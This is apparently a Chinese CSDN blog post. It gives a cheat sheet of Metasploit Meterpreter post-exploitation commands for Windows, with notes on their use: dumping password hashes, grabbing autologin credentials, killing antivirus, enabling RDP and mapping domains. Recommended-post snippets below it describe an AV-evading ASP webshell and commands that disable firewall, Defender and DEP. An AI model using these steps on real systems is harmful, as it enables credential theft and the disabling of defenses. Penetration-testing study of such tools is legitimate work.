post后渗透模块

最新推荐文章于 2023-08-12 09:07:09 发布
最新推荐文章于 2023-08-12 09:07:09 发布
阅读量451 收藏 2
点赞数
分类专栏: 各种渗透 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/X_sweelg/article/details/118806395
版权

run post/windows/gather/enum_logged_on_users        #查看登录过的用户信息

run post/windows/gather/enum_ad_groups        #查看组信息

run post/windows/gather/enum_domain        #定位域控

run post/windows/gather/enum_ad_computers        #域内所有机器

use post/windows/gather/enum_patches        #发现缺失的补丁

use post/multi/recon/local_exploit_suggester        #快速识别可能被利用的漏洞

run post/windows/manage/migrate           #自动进程迁移
 run post/windows/gather/checkvm           #查看目标主机是否运行在虚拟机上
 run post/windows/manage/killav            #关闭杀毒软件
 run post/windows/manage/enable_rdp        #开启远程桌面服务
 run post/windows/manage/autoroute         #查看路由信息
 run post/windows/gather/enum_logged_on_users    #列举当前登录的用户
 run post/windows/gather/enum_applications       #列举应用程序
 run post/windows/gather/credentials/windows_autologin                #抓取自动登录的用户名和密码
 run post/windows/gather/smart_hashdump               #dump出所有用户的hash

Sweelg
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试——万能密码与POST注入
zjdda的博客
05-20 3655
1.万能密码的原理 数据库没有对前端输入的参数的合法性做过率,并且账号和密码 一起输入,可以通过编写恶意语句,将用户与密码的输入结果判断为真,就实现了万能密码的登录。 2.万能密码实例: 查询语句select * from ‘.KaTeX parse error: Double superscript at position 21: …e.' where id=' '̲ and pass=' '; …t_name.’ where id=’ sdadaad’ and pass=’ ‘or’1’=‘1’; 由于
API-fuzzer:API Fuzzer,它允许使用常见的渗透测试技术来模糊请求属性并列出漏洞
02-01
API Fuzzer API_Fuzzer gem接受API请求作为... gem 'API_Fuzzer' 然后执行: $ bundle或自己安装为: $ gem install API_Fuzzer用法运行bin/console 假设您有以下端点POST /api/v2/credit_cards/123Host: test.host....
Python之渗透测试笔记(五) ——Requests模块
12-21
request中文手册:https://requests.readthedocs.io/zh_CN/latest/ Requests模块Requests模块简介Request模块的7个主要参数Response响应内容定制请求头POST请求cookiesession会话请求与响应 Requests模块简介 request模块是python的第三方库,主要功能如下: Keep-Alive & 连接池 国际化域名和 URL 带持久 Cookie 的会话 浏览器式的 SSL 认证 自动内容解码 基本/摘要式的身份认证 优雅的 key/value Cookie 自动解压 Unicode 响应体 HTT
ASP大马网站渗透测试
01-15
一、 整体介绍     本身代码经过变量转换和替换字符加密,可完美过安全狗,护卫神,D盾,safe3 Waf,KOasp木马查杀等IIS防火墙和查杀工具。  程序结合海洋顶端asp木马、老兵asp木马、Drakblade暗黑之剑1.3版本、05年到13年主流asp木马的优点进行开发完善制作。  程序在目录检测功能、隐藏功能、数据库操作和提权处做了较大改进,具体请看下列介绍 二、 提交代码经过ascii 2次转码post提交过IIS安全狗,护卫神,D盾,safe3 Waf等IIS防火墙拦截代码。 三、 登陆成功后显示"欢迎界面","欢迎界面"显示服务器安全指数,等级分为 高、中、低三等级,根据wscript.shell磁盘根目录是否可读取等功能判断。  第一项显示:服务器iis版本、服务器超时时间、以及session信息、服务器CPU数量、主机名、默认管理员信息、Terminal Service终端端口(需要wscript.shell组件支持)支持脚本探测(aspx,php,pl)功能,支持bing查询同服务器所有支持aspx脚本站点。 第二项显示:系统当前路径变量。   第三项显示:磁盘根目录的读取权限问题(判断是否可跨站)。 第四项显示:常用组件信息,左侧11个为危险组件,右侧11个为安全组件。   第五项显示:读取c:\windows\system32\sethc.exe 和 c:\windows\system32\magnify.exe 文件的属性、时间、文件体积,从而判断是否被入侵。 四、 右上角的ZONE-H图标为一键提交被黑网页到被黑站点统计www.zone-h.com.cn,个人信息请编辑程序修改,或用生成器生成。 五、 WEB根目录和本程序目录都可以转入文件操作页。  文件操作一:左侧为磁盘和快捷不安全目录查看(目录为智能判断,不存在则不显示)  文件操作二:右侧为文件操作模块和文件夹操作模块。 文件操作支持浏览器模式打开、编辑(支持UTF-8模式编辑)、复制、移动、删除(支持强制删除只读属性文件)、修改属性为隐藏or正常、数据库模式编辑。 文件夹操作支持修改文件夹属性、删除、复制、移动 数据库模式编辑支持查看内容、修改内容、删除内容、拖库。 六、 功能一分为三项功能 目录检测功能,补丁检测功能以及端口扫描功能。这三项功能不需要服务器过多脚本支持,故而放到一起。 ***目录扫描: 支持单文件检测,目录检测,是否循环所有磁盘,是否选择深度目录扫描和子目录扫描(目录扫描结尾必须加入“\”)
【tools】Meterpreter 操作汇总
热门推荐
qq_21193587的博客
06-04 3万+
Meterpreter 介绍 Meterpreter 号称“黑客瑞士军刀”,Meterpreter 是 Metasploit 框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后能够返回一个我们控制通道,例如利用远程过程带哦用 RPC 服务的一个漏洞,当漏洞被触发后,我们选择 Meterpreter 作为攻击载荷,就能够获得目标系统上的一个 Meterpreter Shell 连接。Meterpreter 是 Metasploit 框架的一个扩展模块,可以调用 Metasploit 的
meterpreter常用命令
m0_52421380的博客
08-12 1528
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。可以使用meterpreter自带的功能实现控制对方手机和电脑。nc,全称为NetworkConnection,是一种网络连接的工具,可以用来在两台计算机之间建立网络连接。
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5418
meterpreter使用攻略(持续更新中)
暗月渗透实战靶场-项目六(下)
高高同学
01-28 1852
暗月渗透实战靶场-项目六(下)
渗透测试基础-POST注入
weixin_45488495的博客
04-08 2004
渗透测试基础-POST注入POST注入是什么POST注入靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! POST注入是什么 post是一种传参方式,大多出现在各种框处,比如登录框,查询框,和各种与数据库有交互的框。 注入攻击是:用户输入的数据当作代码执行,这里有两个关键点 关键点一:用户能够控制输入 关键点二:原本程序要执行的代码,拼接了用户输入的数据 post注入与get注入没有本质的区别,无非就是一个在表单框执
渗透测试之SQL注入(POST型的四种注入手法)、SQL注入绕过手段
Hi~ 土拨鼠
12-11 6580
文章目录使用BurpSuite进行post请求的抓包使用联合查询进行注入:使用报错注入进行注入:布尔盲注:时延查询:SQL注入绕过手段大小写字母绕过双写绕过编码绕过内联注释绕过 POST和GET的区别就是注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。当然可以借助对应的插件可以完成修改任务。 使用BurpSuite进行post请求的抓包 以Sqli-Lab Less11为例。 查看抓的包 将抓到的包发送到repeater模块,就可以进行重复测试了 初步判断sql语句大概为:select un
渗透阶段-meterpreter使用
weixin_39986112的博客
04-08 390
sessions -l 查看我们获得的shell session -i 1 即可切换到id为1的shell sysinfo 查看目标主机的信息 getwd 可以获取当前目标机器的工作目录,也可以获得当前系统的工作目录 route 可以查看路由 getproxy #查看代理信息 autoroute添加路由 run autoroute –h #查看帮助 ...
OWASP-mth3l3m3nt框架:OWASP Mth3l3m3nt框架是一种渗透测试辅助工具和开发框架。 它树立了使用网络以及通过响应式界面不断进行渗透测试来攻击网络的原则
02-03
#OWASP Mth3l3m3nt框架 正在进行稍大的(原谅双关)升级。 这是为了带来诸如: 更容易的编码标准 ... CURL GUI(GET / POST / TRACE / OPTIONS / HEAD) LFI开发模块(当前预装:Koha Lib Lime LFI / Word
AQUARMOURY:我对C和进攻性工具的沉思
03-19
这是一个工具套件,其中包括针对红队/渗透测试人员的多种进攻工具,主要用于防御防御 哥布林 作为AQUARMOURY套件的一部分发布的第一个模块,用于禁用Windows事件和Sysmon日志记录。 。 布朗尼 快速建立DLL Hijacks...
MSF后渗透模块Meterpreter
LainWith的博客
01-27 4156
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
37. Metasploit后渗透攻击:Meterpreter系统命令
__Qian的博客
03-18 2846
1.查看系统信息 命令: sysinfo 2.查看是否为虚拟机 命令:run post/windows/gather/checkvm 3.查看运行时间 命令:idletime 4.查看完整网络配置 命令:route 5.查看当前权限 命令:getuid 6.关闭杀毒软件 命令:run post/windows/manage/killav 7.启动远程桌面 命令:run post/win...
mesploit后渗透测试阶段常用命令
星落的博客
05-24 1万+
1.关闭windows防火墙(需要管理员或system权限) netsh advfirewall set allprofiles state off 2.关闭windefend net stop windefend 3.关闭Bitlocker磁盘加密 manage -bde -off C: manage -bde -status C: 4.关闭DEP bcdedit.exe /set {current} nx AlwaysOff 5.杀死放杀毒软件 run killa..
kali metasploit 后渗透Post模块
qq_51685718的博客
10-28 391
如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能。我这由于没安装火狐导致报错。
渗透测试-[Meterpreter后渗透25招]
m0_43405474的博客
05-07 3163
渗透测试-[后渗透25招]0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(
android手机应用源码Imsdroid语音视频通话源码.rar
最新发布
05-20
android手机应用源码Imsdroid语音视频通话源码.rar
get post 渗透
09-22
GET和POST是HTTP协议中常用的两种请求方法。GET请求用于获取资源,而POST请求用于提交数据进行处理。 GET请求通过URL将请求参数附加在请求头中,参数长度有限制,并且会被保存在浏览器的历史记录中。GET请求一般用于获取数据,不应该用于对服务器进行敏感的操作,因为请求参数会被暴露在URL中。 POST请求将请求参数放在请求体中,不会在URL中暴露,参数长度没有限制。POST请求一般用于向服务器提交数据,可以发送更大量的数据,也可以对服务器进行更新、删除等操作。 在渗透测试中,GET和POST可以通过不同的方式被利用。GET请求可能存在一些安全漏洞,例如未经过滤的用户输入可以导致SQL注入、XSS等漏洞。而POST请求则可能存在CSRF(跨站请求伪造)漏洞,攻击者可以伪造用户的请求进行非法操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sweelg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值